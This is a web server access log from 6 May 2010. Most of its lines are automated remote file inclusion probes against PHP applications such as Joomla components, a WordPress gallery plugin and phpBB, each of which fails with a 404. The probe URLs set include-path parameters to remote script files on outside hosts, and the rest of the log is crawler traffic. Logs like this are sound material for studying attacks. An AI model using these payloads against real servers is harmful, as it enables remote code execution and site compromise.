207.46.204.184 - - [06/May/2010:00:19:52 -0500] "GET /costume/thmb9.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [06/May/2010:00:21:03 -0500] "GET /logs/access_log.1254096000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
222.236.47.182 - - [06/May/2010:00:21:18 -0500] "GET /logs/solpot.html?body=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
222.236.47.182 - - [06/May/2010:00:21:18 -0500] "GET /solpot.html?body=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
222.236.47.182 - - [06/May/2010:00:21:18 -0500] "GET /logs/access_log.1265673600/solpot.html?body=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
222.236.47.182 - - [06/May/2010:00:21:18 -0500] "GET /logs/access_log.1265500800/solpot.html?body=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
121.190.102.21 - - [06/May/2010:00:22:38 -0500] "GET /logs/index/gnuboard4//bbs////download.php?board_skin_path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
121.190.102.21 - - [06/May/2010:00:22:38 -0500] "GET /logs/access_log.1265760000/index/gnuboard4//bbs////download.php?board_skin_path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
121.190.102.21 - - [06/May/2010:00:22:38 -0500] "GET /index/gnuboard4//bbs////download.php?board_skin_path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
121.190.102.21 - - [06/May/2010:00:31:13 -0500] "GET /logs/access_log.1265760000/index/gnuboard4//bbs////download.php?board_skin_path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
121.190.102.21 - - [06/May/2010:00:31:13 -0500] "GET /logs/index/gnuboard4//bbs////download.php?board_skin_path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
121.190.102.21 - - [06/May/2010:00:31:13 -0500] "GET /index/gnuboard4//bbs////download.php?board_skin_path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
121.190.102.21 - - [06/May/2010:00:31:13 -0500] "GET /logs/access_log.1264723200/index/gnuboard4//bbs////download.php?board_skin_path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
65.55.51.115 - - [06/May/2010:00:31:26 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.51.115 - - [06/May/2010:00:32:21 -0500] "GET /artwork/furniture.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
116.12.54.93 - - [06/May/2010:00:35:12 -0500] "GET /logs//accounts/inc/errors.php?error=http://www.cilentotop.it/id? HTTP/1.1" 404 313 "-""libwww-perl/5.65"
116.12.54.93 - - [06/May/2010:00:35:12 -0500] "GET //accounts/inc/errors.php?error=http://www.cilentotop.it/id? HTTP/1.1" 404 308 "-""libwww-perl/5.65"
87.250.255.243 - - [06/May/2010:00:38:01 -0500] "GET /logs/access_log.1252195200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
209.126.254.139 - - [06/May/2010:00:38:26 -0500] "GET //administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
209.126.254.139 - - [06/May/2010:00:38:26 -0500] "GET /logs//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
209.126.254.139 - - [06/May/2010:00:38:26 -0500] "GET /logs/access_log.1270857600%20%20//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 374 "-""Mozilla/5.0"
209.126.254.139 - - [06/May/2010:00:38:26 -0500] "GET //administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
209.126.254.139 - - [06/May/2010:00:38:26 -0500] "GET /logs//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
209.126.254.139 - - [06/May/2010:00:38:27 -0500] "GET /logs/access_log.1270857600%20%20//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 374 "-""Mozilla/5.0"
209.126.254.139 - - [06/May/2010:00:38:51 -0500] "GET /logs/access_log.1270857600//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
209.126.254.139 - - [06/May/2010:00:39:04 -0500] "GET /logs/access_log.1270857600//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
209.126.254.139 - - [06/May/2010:00:39:04 -0500] "GET //administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
209.126.254.139 - - [06/May/2010:00:39:04 -0500] "GET /logs//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
209.126.254.139 - - [06/May/2010:00:39:04 -0500] "GET /logs/access_log.1270857600//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
209.126.254.139 - - [06/May/2010:00:39:28 -0500] "GET /logs/access_log.1270857600%20%20//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 374 "-""Mozilla/5.0"
67.218.116.134 - - [06/May/2010:00:40:34 -0500] "GET /logs/access_log.1219622400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
116.12.54.93 - - [06/May/2010:00:49:01 -0500] "GET /logs//index.php?file_op=http://www.cilentotop.it/id? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
116.12.54.93 - - [06/May/2010:00:49:01 -0500] "GET //index.php?file_op=http://www.cilentotop.it/id? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
87.250.255.243 - - [06/May/2010:00:52:00 -0500] "GET /logs/access_log.1260921600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.238.162.183 - - [06/May/2010:00:55:55 -0500] "GET /logs/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.fashionaarschot.be/images/idv6.txt??? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
87.238.162.183 - - [06/May/2010:00:55:55 -0500] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.fashionaarschot.be/images/idv6.txt??? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
207.46.199.180 - - [06/May/2010:00:56:53 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
212.47.221.153 - - [06/May/2010:00:57:49 -0500] "GET //content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
212.47.221.153 - - [06/May/2010:00:57:49 -0500] "GET /logs//content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
212.47.221.153 - - [06/May/2010:00:57:49 -0500] "GET /logs/access_log.1272067200%20%20//content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
116.12.54.93 - - [06/May/2010:01:01:20 -0500] "GET /logs//jscript.php?my_ms[root]=http://www.cilentotop.it/id? HTTP/1.1" 404 301 "-""libwww-perl/5.65"
116.12.54.93 - - [06/May/2010:01:01:20 -0500] "GET //jscript.php?my_ms[root]=http://www.cilentotop.it/id? HTTP/1.1" 404 296 "-""libwww-perl/5.65"
87.250.255.243 - - [06/May/2010:01:03:27 -0500] "GET /logs/access_log.1218758400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
121.190.102.21 - - [06/May/2010:01:11:40 -0500] "GET /logs//blocks/block_site_map.php?root_folder_path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
121.190.102.21 - - [06/May/2010:01:11:40 -0500] "GET //blocks/block_site_map.php?root_folder_path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
121.190.102.21 - - [06/May/2010:01:11:40 -0500] "GET /logs/access_log.1270512000//blocks/block_site_map.php?root_folder_path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
121.190.102.21 - - [06/May/2010:01:11:45 -0500] "GET //blocks/block_site_map.php?root_folder_path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
121.190.102.21 - - [06/May/2010:01:11:45 -0500] "GET /logs//blocks/block_site_map.php?root_folder_path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
121.190.102.21 - - [06/May/2010:01:11:45 -0500] "GET /logs/access_log.1263427200//blocks/block_site_map.php?root_folder_path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
121.190.102.21 - - [06/May/2010:01:12:14 -0500] "GET /logs//blocks/block_site_map.php?root_folder_path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
121.190.102.21 - - [06/May/2010:01:12:14 -0500] "GET /logs/access_log.1263427200//blocks/block_site_map.php?root_folder_path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
121.190.102.21 - - [06/May/2010:01:12:14 -0500] "GET //blocks/block_site_map.php?root_folder_path=http://nic.bupt.edu.cn/media/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
67.19.33.58 - - [06/May/2010:01:12:17 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
67.19.33.58 - - [06/May/2010:01:12:17 -0500] "GET /logs/access_log.1270598400%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 375 "-""Mozilla/5.0"
67.19.33.58 - - [06/May/2010:01:12:18 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
209.90.87.106 - - [06/May/2010:01:13:00 -0500] "GET /logs/access_log.1270598400%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 375 "-""Mozilla/5.0"
209.90.87.106 - - [06/May/2010:01:13:00 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
209.90.87.106 - - [06/May/2010:01:13:00 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
209.90.87.106 - - [06/May/2010:01:13:04 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
209.90.87.106 - - [06/May/2010:01:13:04 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
209.90.87.106 - - [06/May/2010:01:13:04 -0500] "GET /logs/access_log.1270598400%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 375 "-""Mozilla/5.0"
67.19.33.58 - - [06/May/2010:01:13:16 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
67.19.33.58 - - [06/May/2010:01:13:16 -0500] "GET /logs/access_log.1270598400%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 375 "-""Mozilla/5.0"
67.19.33.58 - - [06/May/2010:01:13:17 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
66.249.71.205 - - [06/May/2010:01:13:28 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 304 - "-""Googlebot-Image/1.0"
67.19.33.58 - - [06/May/2010:01:13:51 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
67.19.33.58 - - [06/May/2010:01:13:51 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
67.19.33.58 - - [06/May/2010:01:13:52 -0500] "GET /logs/access_log.1270598400%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 375 "-""Mozilla/5.0"
74.54.22.2 - - [06/May/2010:01:15:54 -0500] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://wanso.ssu.ac.kr/zboard/admin/1.gif?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
74.54.22.2 - - [06/May/2010:01:15:54 -0500] "GET //tools/send_reminders.php?noSet=0&includedir=http://wanso.ssu.ac.kr/zboard/admin/1.gif?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
74.54.22.2 - - [06/May/2010:01:15:54 -0500] "GET /logs/access_log.1229731200%20%20//tools/send_reminders.php?noSet=0&includedir=http://wanso.ssu.ac.kr/zboard/admin/1.gif?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
74.54.22.2 - - [06/May/2010:01:16:04 -0500] "GET //tools/send_reminders.php?noSet=0&includedir=http://wanso.ssu.ac.kr/zboard/admin/1.gif?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
74.54.22.2 - - [06/May/2010:01:16:04 -0500] "GET /logs/access_log.1229731200%20%20//tools/send_reminders.php?noSet=0&includedir=http://wanso.ssu.ac.kr/zboard/admin/1.gif?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
74.54.22.2 - - [06/May/2010:01:16:04 -0500] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://wanso.ssu.ac.kr/zboard/admin/1.gif?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
87.250.255.243 - - [06/May/2010:01:17:44 -0500] "GET /logs/access_log.1232236800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.218.116.131 - - [06/May/2010:01:18:09 -0500] "GET /logs/access_log.1230681600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.19.33.58 - - [06/May/2010:01:19:16 -0500] "GET /logs/access_log.1270598400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 373 "-""Mozilla/5.0"
209.90.87.106 - - [06/May/2010:01:22:38 -0500] "GET /logs/access_log.1270598400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.cricermenate.it/idxx.txt? HTTP/1.1" 404 373 "-""Mozilla/5.0"
81.208.34.38 - - [06/May/2010:01:26:46 -0500] "GET /logs//blocks/block_site_map.php?root_folder_path=http://nbashop.ru//imgs/nbashop/photos/id1.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
81.208.34.38 - - [06/May/2010:01:26:46 -0500] "GET /logs/access_log.1270512000//blocks/block_site_map.php?root_folder_path=http://nbashop.ru//imgs/nbashop/photos/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
81.208.34.38 - - [06/May/2010:01:26:46 -0500] "GET //blocks/block_site_map.php?root_folder_path=http://nbashop.ru//imgs/nbashop/photos/id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
81.208.34.38 - - [06/May/2010:01:27:09 -0500] "GET /logs/access_log.1262390400//blocks/block_site_map.php?root_folder_path=http://nbashop.ru//imgs/nbashop/photos/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
81.208.34.38 - - [06/May/2010:01:27:09 -0500] "GET /logs/access_log.1263427200//blocks/block_site_map.php?root_folder_path=http://nbashop.ru//imgs/nbashop/photos/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
81.208.34.38 - - [06/May/2010:01:28:09 -0500] "GET /logs/access_log.1266192000//blocks/block_site_map.php?root_folder_path=http://nbashop.ru//imgs/nbashop/photos/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
83.237.226.29 - - [06/May/2010:01:29:36 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
64.251.10.117 - - [06/May/2010:01:33:06 -0500] "GET /logs//adminhead.php?path[docroot]=http://42art.com/bbs/skin/ggambo_bogal/id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
64.251.10.117 - - [06/May/2010:01:33:07 -0500] "GET //adminhead.php?path[docroot]=http://42art.com/bbs/skin/ggambo_bogal/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
64.251.10.117 - - [06/May/2010:01:33:07 -0500] "GET /logs/access_log.1272067200%20%20//adminhead.php?path[docroot]=http://42art.com/bbs/skin/ggambo_bogal/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
64.251.10.117 - - [06/May/2010:01:33:10 -0500] "GET /logs/access_log.1270598400%20%20//adminhead.php?path[docroot]=http://42art.com/bbs/skin/ggambo_bogal/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
64.251.10.117 - - [06/May/2010:01:34:17 -0500] "GET //adminhead.php?path[docroot]=http://42art.com/bbs/skin/ggambo_bogal/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
64.251.10.117 - - [06/May/2010:01:34:17 -0500] "GET /logs/access_log.1272067200%20%20//adminhead.php?path[docroot]=http://42art.com/bbs/skin/ggambo_bogal/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
64.251.10.117 - - [06/May/2010:01:34:17 -0500] "GET /logs//adminhead.php?path[docroot]=http://42art.com/bbs/skin/ggambo_bogal/id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
64.251.10.117 - - [06/May/2010:01:34:23 -0500] "GET /logs/access_log.1270598400%20%20//adminhead.php?path[docroot]=http://42art.com/bbs/skin/ggambo_bogal/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
64.251.10.117 - - [06/May/2010:01:35:19 -0500] "GET /logs/access_log.1270598400//adminhead.php?path[docroot]=http://42art.com/bbs/skin/ggambo_bogal/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
64.251.10.117 - - [06/May/2010:01:35:19 -0500] "GET /logs/access_log.1272067200//adminhead.php?path[docroot]=http://42art.com/bbs/skin/ggambo_bogal/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
64.251.10.117 - - [06/May/2010:01:36:31 -0500] "GET /logs/access_log.1272067200//adminhead.php?path[docroot]=http://42art.com/bbs/skin/ggambo_bogal/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
64.251.10.117 - - [06/May/2010:01:36:36 -0500] "GET /logs/access_log.1270598400//adminhead.php?path[docroot]=http://42art.com/bbs/skin/ggambo_bogal/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
64.251.10.117 - - [06/May/2010:01:37:06 -0500] "GET /logs/access_log.1265414400//adminhead.php?path[docroot]=http://42art.com/bbs/skin/ggambo_bogal/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
64.251.10.117 - - [06/May/2010:01:37:16 -0500] "GET /logs/access_log.1265932800//adminhead.php?path[docroot]=http://42art.com/bbs/skin/ggambo_bogal/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
87.250.255.243 - - [06/May/2010:01:37:43 -0500] "GET /costume/thmb1.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
64.251.10.117 - - [06/May/2010:01:38:52 -0500] "GET /logs/access_log.1265414400//adminhead.php?path[docroot]=http://42art.com/bbs/skin/ggambo_bogal/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
64.251.10.117 - - [06/May/2010:01:38:54 -0500] "GET /logs/access_log.1265932800//adminhead.php?path[docroot]=http://42art.com/bbs/skin/ggambo_bogal/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
207.46.199.178 - - [06/May/2010:01:41:41 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.235.124.132 - - [06/May/2010:01:47:34 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""-"
66.235.124.132 - - [06/May/2010:01:47:40 -0500] "GET /tattoo/ HTTP/1.1" 200 466 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11"
189.108.172.26 - - [06/May/2010:01:52:21 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
189.108.172.26 - - [06/May/2010:01:52:21 -0500] "GET /logs/access_log.1237420800%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 375 "-""Mozilla/5.0"
189.108.172.26 - - [06/May/2010:01:52:21 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
189.108.172.26 - - [06/May/2010:01:52:21 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
189.108.172.26 - - [06/May/2010:01:52:21 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
189.108.172.26 - - [06/May/2010:01:52:35 -0500] "GET /logs/access_log.1237420800%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 375 "-""Mozilla/5.0"
189.108.172.26 - - [06/May/2010:01:52:51 -0500] "GET /logs/access_log.1270512000%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 375 "-""Mozilla/5.0"
189.108.172.26 - - [06/May/2010:01:52:56 -0500] "GET /logs/access_log.1270512000%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 375 "-""Mozilla/5.0"
189.108.172.26 - - [06/May/2010:01:53:10 -0500] "GET /logs/access_log.1265673600//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
189.108.172.26 - - [06/May/2010:01:53:10 -0500] "GET /logs/access_log.1265500800//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
189.108.172.26 - - [06/May/2010:01:53:57 -0500] "GET /logs/access_log.1265673600//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
189.108.172.26 - - [06/May/2010:01:54:02 -0500] "GET /logs/access_log.1265500800//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
87.250.255.243 - - [06/May/2010:01:57:37 -0500] "GET /logs/access_log.1255651200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
222.236.47.182 - - [06/May/2010:01:58:36 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
222.236.47.182 - - [06/May/2010:01:58:36 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
222.236.47.182 - - [06/May/2010:01:58:36 -0500] "GET /logs/access_log.1251504000//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
222.236.47.182 - - [06/May/2010:01:58:41 -0500] "GET /logs/access_log.1265673600//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
207.46.13.89 - - [06/May/2010:02:00:53 -0500] "GET /logs/access_log.1205280000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.236.47.182 - - [06/May/2010:02:02:17 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
222.236.47.182 - - [06/May/2010:02:02:17 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
222.236.47.182 - - [06/May/2010:02:02:17 -0500] "GET /logs/access_log.1251504000//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
222.236.47.182 - - [06/May/2010:02:02:17 -0500] "GET /logs/access_log.1265673600//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://onoi.org//administrator/includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
87.250.255.243 - - [06/May/2010:02:06:14 -0500] "GET /logs/access_log.1226275200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
189.108.172.26 - - [06/May/2010:02:06:58 -0500] "GET //forum/toplist.php?phpbb_root_path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
189.108.172.26 - - [06/May/2010:02:06:58 -0500] "GET /logs/access_log.1262822400//forum/toplist.php?phpbb_root_path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
189.108.172.26 - - [06/May/2010:02:06:58 -0500] "GET /logs//forum/toplist.php?phpbb_root_path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
